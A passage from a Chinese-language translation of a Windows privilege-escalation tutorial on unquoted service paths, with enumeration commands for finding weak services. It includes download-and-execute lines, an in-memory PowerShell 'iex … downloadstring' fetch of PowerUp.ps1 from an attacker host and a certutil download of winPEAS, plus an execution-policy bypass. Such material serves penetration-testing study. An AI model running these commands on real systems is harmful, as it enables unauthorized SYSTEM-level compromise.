<!doctype html>
<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-tutorial-basics/未引用的服务路径 - Windows特权升级" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.7.0">
<title data-rh="true">未引用的服务路径 - Windows特权升级 | My Site</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:image" content="https://your-docusaurus-site.example.com/blog/img/docusaurus-social-card.jpg"><meta data-rh="true" name="twitter:image" content="https://your-docusaurus-site.example.com/blog/img/docusaurus-social-card.jpg"><meta data-rh="true" property="og:url" content="https://your-docusaurus-site.example.com/blog/docs/tutorial-basics/未引用的服务路径 - Windows特权升级"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="未引用的服务路径 - Windows特权升级 | My Site"><meta data-rh="true" name="description" content="本文通过 Google 翻译 Unquoted Service Paths – Windows Privilege Escalation 这篇文章所产生，本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。"><meta data-rh="true" property="og:description" content="本文通过 Google 翻译 Unquoted Service Paths – Windows Privilege Escalation 这篇文章所产生，本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。"><link data-rh="true" rel="icon" href="/blog/img/favicon.ico"><link data-rh="true" rel="canonical" href="https://your-docusaurus-site.example.com/blog/docs/tutorial-basics/未引用的服务路径 - Windows特权升级"><link data-rh="true" rel="alternate" href="https://your-docusaurus-site.example.com/blog/docs/tutorial-basics/未引用的服务路径 - Windows特权升级" hreflang="en"><link data-rh="true" rel="alternate" href="https://your-docusaurus-site.example.com/blog/docs/tutorial-basics/未引用的服务路径 - Windows特权升级" hreflang="x-default"><link rel="alternate" type="application/rss+xml" href="/blog/blog/rss.xml" title="My Site RSS Feed">
<link rel="alternate" type="application/atom+xml" href="/blog/blog/atom.xml" title="My Site Atom Feed"><link rel="stylesheet" href="/blog/assets/css/styles.ebd0f903.css">
<script src="/blog/assets/js/runtime~main.0a24cf26.js" defer="defer"></script>
<script src="/blog/assets/js/main.5ce3fefc.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<script>!function(){function t(t){document.documentElement.setAttribute("data-theme",t)}var e=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();t(null!==e?e:"light")}(),function(){try{const n=new URLSearchParams(window.location.search).entries();for(var[t,e]of n)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><link rel="preload" as="image" href="/blog/img/logo.svg"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="navbar navbar--fixed-top"><div class="navbar__inner"><div class="navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/blog/"><div class="navbar__logo"><img src="/blog/img/logo.svg" alt="My Site Logo" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/blog/img/logo.svg" alt="My Site Logo" class="themedComponent_mlkZ themedComponent--dark_xIcU"></div><b class="navbar__title text--truncate">My Site</b></a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/blog/docs/intro">Tutorial</a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/blog/">Blog</a></div><div class="navbar__items navbar__items--right"><a href="https://github.com/facebook/docusaurus" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">GitHub<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="Switch between dark and light mode (currently light mode)" aria-label="Switch between dark and light mode (currently light mode)" aria-live="polite" aria-pressed="false"><svg viewBox="0 0 24 24" width="24" height="24" class="lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" class="darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="Scroll back to top" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd"><nav aria-label="Docs sidebar" class="menu thin-scrollbar menu_SIkG"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/blog/docs/intro">Tutorial Intro</a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--active" href="/blog/docs/category/tutorial---basics">Tutorial - Basics</a><button aria-label="Collapse sidebar category &#x27;Tutorial - Basics&#x27;" aria-expanded="true" type="button" class="clean-btn menu__caret"></button></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/blog/docs/tutorial-basics/create-a-page">Create a Page</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/blog/docs/tutorial-basics/create-a-document">Create a Document</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/blog/docs/tutorial-basics/create-a-blog-post">Create a Blog Post</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/blog/docs/tutorial-basics/markdown-features">Markdown Features</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/blog/docs/tutorial-basics/deploy-your-site">Deploy your site</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/blog/docs/tutorial-basics/congratulations">Congratulations!</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/blog/docs/tutorial-basics/未引用的服务路径 - Windows特权升级">未引用的服务路径 - Windows特权升级</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/blog/docs/tutorial-basics/DLL劫持 - Windows特权升级">DLL劫持 - Windows特权升级</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/blog/docs/tutorial-basics/填坑记录">填坑记录</a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/blog/docs/category/tutorial---extras">Tutorial - Extras</a><button aria-label="Expand sidebar category &#x27;Tutorial - Extras&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li></ul></nav></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="Breadcrumbs"><ul class="breadcrumbs" itemscope="" itemtype="https://schema.org/BreadcrumbList"><li class="breadcrumbs__item"><a aria-label="Home page" class="breadcrumbs__link" href="/blog/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item"><a class="breadcrumbs__link" itemprop="item" href="/blog/docs/category/tutorial---basics"><span itemprop="name">Tutorial - Basics</span></a><meta itemprop="position" content="1"></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link" itemprop="name">未引用的服务路径 - Windows特权升级</span><meta itemprop="position" content="2"></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">On this page</button></div><div class="theme-doc-markdown markdown"><header><h1>未引用的服务路径 - Windows特权升级</h1></header><blockquote>
<p>本文通过 Google 翻译 <a href="https://juggernaut-sec.com/unquoted-service-paths/" target="_blank" rel="noopener noreferrer">Unquoted Service Paths – Windows Privilege Escalation</a> 这篇文章所产生，本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。</p>
</blockquote>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="导航">导航<a href="#导航" class="hash-link" aria-label="Direct link to 导航" title="Direct link to 导航">​</a></h2>
<ul>
<li><a href="#id0">0 前言</a></li>
<li><a href="#id1">1 未引用的服务路径漏洞原理</a></li>
<li><a href="#id2">2 搜寻未引用的服务路径</a>
<ul>
<li><a href="#id2.1">2.1 枚举未引用的服务路径-手动</a></li>
<li><a href="#id2.2">2.2 枚举未引用的服务路径-工具</a>
<ul>
<li><a href="#id2.2.1">2.2.1 PowerUp.ps1</a></li>
<li><a href="#id2.2.2">2.2.2 winPEAS</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#id3">3 沿着服务路径枚举目录权限</a>
<ul>
<li><a href="#id3.1">3.1 cmd.exe（icacls）</a></li>
<li><a href="#id3.2">3.2 PowerShell（Get-ACL）</a></li>
<li><a href="#id3.3">3.3 accesschk</a></li>
<li><a href="#id3.4">3.4 winPEAS</a></li>
</ul>
</li>
<li><a href="#id4">4 自制反向 shell 载荷</a></li>
<li><a href="#id5">5 利用未引用的服务路径</a></li>
<li><a href="#id6">6 滥用 PowerUp.ps1 功能</a></li>
</ul>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="0前言"><strong><div id="id0">0、前言</div></strong><a href="#0前言" class="hash-link" aria-label="Direct link to 0前言" title="Direct link to 0前言">​</a></h2>
<p>在 Windows 提权技术中，最常见的提权方式是利用服务的错误配置。而服务错误配置的方式有很多，但迄今为止最有趣的还得是服务路径未被引用。在这篇文章中，我们将看到由<strong>薄弱的目录权限</strong>和<strong>带有空格和无引号的服务路径</strong>组合在一起之后是如何使得用户权限从标准用户被提升到了本地 SYSTEM。</p>
<p>首先，我们使用手动技术和自动工具去枚举发现未引用的服务路径。其次，通过进一步枚举，确定我们是否拥有路径中某个目录的写入权限。然后，通过手工自制一个反向 shell 的程序，并在攻击者机器上完成编译。最后，我们会将这个自制程序传输到受害者的特定目录下，并重启系统以获得 SYSTEM shell。</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="1未引用的服务路径漏洞原理"><strong><div id="id1">1、未引用的服务路径漏洞原理</div></strong><a href="#1未引用的服务路径漏洞原理" class="hash-link" aria-label="Direct link to 1未引用的服务路径漏洞原理" title="Direct link to 1未引用的服务路径漏洞原理">​</a></h2>
<p>未加引号的服务路径漏洞是指：当 Windows 在启动服务时，如果服务的可执行文件路径中包含有<strong>空格</strong>，但整个路径又未使用<strong>双引号</strong>包裹。此时，系统便会按照<strong>路径优先级</strong>逐层查找可执行文件。例如：</p>
<p>假设一个服务的路径是 <code>C:\Program Files\Juggernaut Prod\Production Tools\Juggernaut.exe</code>。此时，Windows 可能会按照以下顺序逐个尝试查找并执行服务启动程序。</p>
<ul>
<li><code>C:\Program.exe</code></li>
<li><code>C:\Program Files\Juggernaut.exe</code></li>
<li><code>C:\Program Files\Juggernaut Prod\Production.exe</code></li>
<li><code>C:\Program Files\Juggernaut Prod\Production Tools\Juggernaut.exe</code></li>
</ul>
<p>这意味着，如果我们有权限在实际的可执行文件位置之前的三个目录中的任何一个中写入内容，那我们就可以制作一个可执行文件，并根据路径中的名称为其命名，就像上面的例子一样。之后，当服务启动时，它将执行我们的恶意程序，而不是预定的程序。</p>
<p>如果我们可以写入 <code>C:\</code>，我们将制作一个名为 Program.exe 的可执行文件，并将其放入 <code>C:\</code>；如果我们能写入 <code>C:\Program Files</code>，我们就会制作一个名为 Juggernaut.exe 的可执行文件，并将其放入 <code>C:\Program Files</code>。以此类推...</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="2搜寻未引用的服务路径"><strong><div id="id2">2、搜寻未引用的服务路径</div></strong><a href="#2搜寻未引用的服务路径" class="hash-link" aria-label="Direct link to 2搜寻未引用的服务路径" title="Direct link to 2搜寻未引用的服务路径">​</a></h2>
<p>在此示例中，假设我们作为标准用户 cmarko 已在目标机器上获得了立足点。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-44.png" alt="" class="img_ev3q"></p>
<p>在获得立足点之后的首要事情便是通过 <code>whoami /priv</code> 命令检查当前用户的特权。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-45.png" alt="" class="img_ev3q"></p>
<p>可以看到用户 cmarko 拥有 SeShutdownPrivilege 权限，而这一点在稍后利用服务获取 SYSTEM shell 时非常重要，因为需要以重启主机的方式重启服务。【因为在大多数情况下，虽然我们有能力滥用服务，但却没有停止和启动服务的权限。而如果服务是自启动的，那我们就可以利用重启机器来重启服务。】</p>
<p>在有了立足点之后，我们就可以利用内置命令手动枚举系统中任何未引用的服务路径，或者也可以利用工具来查找这些错误配置。</p>
<h4 class="anchor anchorWithStickyNavbar_LWe7" id="21枚举未引用的服务路径-手动"><strong><div id="id2.1">2.1、枚举未引用的服务路径-手动</div></strong><a href="#21枚举未引用的服务路径-手动" class="hash-link" aria-label="Direct link to 21枚举未引用的服务路径-手动" title="Direct link to 21枚举未引用的服务路径-手动">​</a></h4>
<p>可以使用 cmd.exe 和 PowerShell 手动查找系统中任何未引用的服务路径。</p>
<p>在 cmd 中的命令如下：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">wmic service get name,displayname,startmode,pathname | findstr /i /v &quot;C:\Windows\\&quot; |findstr /i /v &quot;&quot;&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-49-1024x140.png" alt="" class="img_ev3q"></p>
<p>在上述命令中，我们使用 wmic 查询服务并提取了我们感兴趣的信息。同时还使用 findstr 命令过滤掉了以 <code>C:\Windows</code> 开头的目录中的任何结果，因为在这些目录中即便发现了错误配置我们也没有写入权限。而第二个 findstr 命令会筛选任何包含双引号的结果。</p>
<p>在 PowerShell 中的等效命令如下：</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike &quot;C:\Windows*&quot; -and $_.PathName -notlike &#x27;&quot;*&#x27;} | select Name,DisplayName,StartMode,PathName</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-50.png" alt="" class="img_ev3q"></p>
<p>经过上面这两个命令的查询发现，Juggernaut 服务具有未引用的服务路径，并且该服务是自启动服务。</p>
<h4 class="anchor anchorWithStickyNavbar_LWe7" id="22枚举未引用的服务路径-工具"><strong><div id="id2.2">2.2、枚举未引用的服务路径-工具</div></strong><a href="#22枚举未引用的服务路径-工具" class="hash-link" aria-label="Direct link to 22枚举未引用的服务路径-工具" title="Direct link to 22枚举未引用的服务路径-工具">​</a></h4>
<p>有很多后利用工具和脚本可使用，但在本例中，我们将坚持使用 <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1" target="_blank" rel="noopener noreferrer">PowerUp.ps1</a> 和 <a href="https://github.com/carlospolop/PEASS-ng/" target="_blank" rel="noopener noreferrer">winPEASx64.exe</a>。</p>
<p>在下载每个工具的副本之后，我们将其转移到受害者机器。</p>
<h6 class="anchor anchorWithStickyNavbar_LWe7" id="221powerupps1"><strong><div id="id2.2.1">2.2.1、PowerUp.ps1</div></strong><a href="#221powerupps1" class="hash-link" aria-label="Direct link to 221powerupps1" title="Direct link to 221powerupps1">​</a></h6>
<p>在此例中，我们先将以下命令附加到 PowerUp.ps1 脚本的底部：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">echo &#x27;Invoke-AllChecks&#x27; &gt;&gt; PowerUp.ps1</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-51.png" alt="" class="img_ev3q"></p>
<p>接着，在脚本的当前目录下启动 HTTP 服务器。</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">python3 -m http.server 80</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>然后，使用命令 <code>powershell -ep bypass</code> 进入受害者 shell 上的 PowerShell 会话中，再使用以下命令将 PowerUp.ps1 直接下载到内存中并执行脚本：</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">iex(new-object net.webclient).downloadstring(&#x27;http://172.16.1.30/PowerUp.ps1&#x27;)</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-52.png" alt="" class="img_ev3q"></p>
<p>在这里，可以看到 PowerUp 能够为我们枚举这种错误配置的服务。此外，PowerUp.ps1 还内置函数可以用来滥用它发现的大多数错误配置。不过，需要指出的是，当 PowerUp 发现一个未引用的服务路径时，并不一定就意味着它是“易受攻击的”，因为 PowerUp 只是识别了错误配置，然后在假定在未引用的服务路径可被利用的情况下提供了一个 AbuseFunction，具体能否利用还是需要自己去判断。【注：滥用操作在本文的<a href="#id6">第 6 节</a>讲述】</p>
<h6 class="anchor anchorWithStickyNavbar_LWe7" id="222winpeas"><strong><div id="id2.2.2">2.2.2、winPEAS</div></strong><a href="#222winpeas" class="hash-link" aria-label="Direct link to 222winpeas" title="Direct link to 222winpeas">​</a></h6>
<p>接下来开始 winPEAS 工具的使用，首先需要下载 winPEAS 的副本并传输到受害者机器上。</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">certutil -split -f -urlcache &quot;http://172.16.1.30/winPEASx64.exe&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-54.png" alt="" class="img_ev3q"></p>
<p>在受害者机器上执行 winPEAS 之后，会发现 winPEAS 会输出大量的信息让人很容易犯迷糊，因此避免迷糊的关键在于<strong>要清楚我们要找的信息所在的标识位置</strong>。对于未引用的服务路径，我们要检查“<strong>Services Information</strong>”部分。这里会为我们提供有关服务名称、服务启动程序路径和启动类型等信息。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-53.png" alt="" class="img_ev3q"></p>
<p>此外，如果我们继续向下查看 PEAS 的输出结果，就会发现它还枚举了在未引用路径上哪些目录我们具有写入权限。</p>
<blockquote>
<p>毫无疑问，winPEAS 的能力实在是令人难以置信。但是，如果你要从输出的内容中获取到有用的信息的话，还是要多锻炼锻炼。</p>
</blockquote>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="3沿着服务路径枚举目录权限"><strong><div id="id3">3、沿着服务路径枚举目录权限</div></strong><a href="#3沿着服务路径枚举目录权限" class="hash-link" aria-label="Direct link to 3沿着服务路径枚举目录权限" title="Direct link to 3沿着服务路径枚举目录权限">​</a></h2>
<p>目前，我们已经发现了未引用的服务路径，但仍无法确定它是否真的脆弱。为此，可以使用内置命令 icacls 或 Get-Acl 来检查沿着服务路径上每一层目录的权限，另外，也还会使用外部工具 accesschk.exe 来检查。</p>
<h4 class="anchor anchorWithStickyNavbar_LWe7" id="31cmdexeicacls"><strong><div id="id3.1">3.1、cmd.exe（icacls）</div></strong><a href="#31cmdexeicacls" class="hash-link" aria-label="Direct link to 31cmdexeicacls" title="Direct link to 31cmdexeicacls">​</a></h4>
<p>首先，在 cmd 会话中使用内置命令 icacls 来检查目录和文件的 ACL 的权限。而为了能理解 icacls 命令输出的信息，我们需要了解以下关于权限和用户组相关的知识：</p>
<p>【知识1】：我们要查找的目录权限只要是以下三种权限中的任意一种均可：</p>
<ul>
<li>(F) Full Control【完全控制】</li>
<li>(M) Modify【修改】</li>
